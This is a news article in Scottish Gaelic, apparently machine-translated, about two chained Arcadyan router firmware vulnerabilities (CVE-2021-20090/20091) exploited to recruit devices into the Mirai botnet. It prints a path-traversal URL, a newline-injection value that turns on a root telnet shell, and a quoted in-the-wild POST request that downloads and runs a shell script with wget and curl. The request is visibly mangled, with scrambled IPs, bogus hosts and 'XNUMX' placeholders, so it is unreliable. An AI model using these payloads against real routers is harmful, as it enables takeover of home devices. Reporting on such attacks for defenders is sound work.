So-leòntachd ann an routers dachaigh a’ toirt buaidh air 17 luchd-saothrachaidh

Chaidh ionnsaigh mhòr a chlàradh air an lìonra an aghaidh routers dachaigh aig a bheil am firmware aca a’ cleachdadh buileachadh frithealaiche HTTP bhon chompanaidh Arcadyan. Gus smachd fhaighinn air innealan, thathas a’ cleachdadh measgachadh de dhà chugallachd a leigeas le còd neo-riaghailteach a chuir an gnìomh aig astar le còraichean freumh. Bidh an duilgheadas a’ toirt buaidh air raon farsaing de routers ADSL bho Arcadyan, ASUS agus Buffalo, a bharrachd air innealan a chaidh a thoirt seachad fo na suaicheantasan Beeline (tha an duilgheadas air a dhearbhadh ann an Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone agus luchd-obrachaidh telecom eile. Thathas a’ toirt fa-near gu bheil an duilgheadas air a bhith an làthair ann am firmware Arcadyan airson còrr air 10 bliadhna agus rè na h-ùine seo chaidh aige air gluasad gu co-dhiù 20 modal inneal bho 17 diofar luchd-saothrachaidh.

Tha a’ chiad so-leòntachd, CVE-2021-20090, ga dhèanamh comasach faighinn gu sgriobt eadar-aghaidh lìn sam bith gun dearbhadh. Is e brìgh na so-leòntachd gu bheil cuid de chlàran anns an eadar-aghaidh lìn tro bheil ìomhaighean, faidhlichean CSS agus sgriobtaichean JavaScript air an cur a-steach ruigsinneach gun dearbhadh. Anns a ’chùis seo, thathas a’ sgrùdadh clàran far a bheil ruigsinneachd gun dearbhadh ceadaichte leis a ’chiad masg. Tha am firmware air a bhacadh le bhith a’ sònrachadh charactaran “../” ann an slighean airson a dhol don eòlaire phàrant, ach le bhith a’ cleachdadh a’ chothlamadh “..%2f” tha e air a sheachnadh. Mar sin, tha e comasach duilleagan fo dhìon fhosgladh nuair a thathar a’ cur iarrtasan mar “http://192.168.1.1/images/..%2findex.htm”.

Tha an dàrna so-leòntachd, CVE-2021-20091, a’ leigeil le neach-cleachdaidh dearbhte atharrachaidhean a dhèanamh air roghainnean siostam an inneil le bhith a’ cur paramadairean ann an cruth sònraichte gu sgriobt apply_abstract.cgi, nach dèan sgrùdadh airson làthaireachd caractar loidhne ùr anns na paramadairean . Mar eisimpleir, nuair a bhios e a’ coileanadh gnìomhachd ping, faodaidh neach-ionnsaigh an luach “192.168.1.2% 0AARC_SYS_TelnetdEnable=1” a shònrachadh san raon leis an t-seòladh IP ga sgrùdadh, agus an sgriobt, nuair a chruthaicheas tu am faidhle roghainnean /tmp/etc/config/ .glbcfg, sgrìobhaidh e an loidhne “AARC_SYS_TelnetdEnable=1” a-steach innte”, a chuireas an gnìomh am frithealaiche telnetd, a bheir ruigsinneachd shligean gun bhacadh le còraichean freumha. San aon dòigh, le bhith a’ suidheachadh paramadair AARC_SYS, faodaidh tu còd sam bith a chuir an gnìomh air an t-siostam. Tha a’ chiad so-leòntachd ga dhèanamh comasach sgriobt trioblaideach a ruith gun dearbhadh le bhith ga ruigsinn mar “/images/..%2fapply_abstract.cgi”.

Gus brath a ghabhail air so-leòntachd, feumaidh neach-ionnsaigh a bhith comasach air iarrtas a chuir chun phort lìonra air a bheil an eadar-aghaidh lìn a’ ruith. A ’breithneachadh le daineamaigs sgaoileadh an ionnsaigh, bidh mòran de ghnìomhaichean a’ fàgail ruigsinneachd air na h-innealan aca bhon lìonra a-muigh gus breithneachadh dhuilgheadasan leis an t-seirbheis taic a dhèanamh nas sìmplidhe. Ma tha ruigsinneachd air an eadar-aghaidh cuingealaichte ris an lìonra a-staigh a-mhàin, faodar ionnsaigh a dhèanamh bho lìonra a-muigh a’ cleachdadh an dòigh “DNS rebinding”. Tha so-leòntachd mu thràth gan cleachdadh gu gnìomhach gus routers a cheangal ri botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Ceangal: dùin User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_212.192.241.7ipaddress=0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Source: fosgailtenet.ru

Cuir beachd ann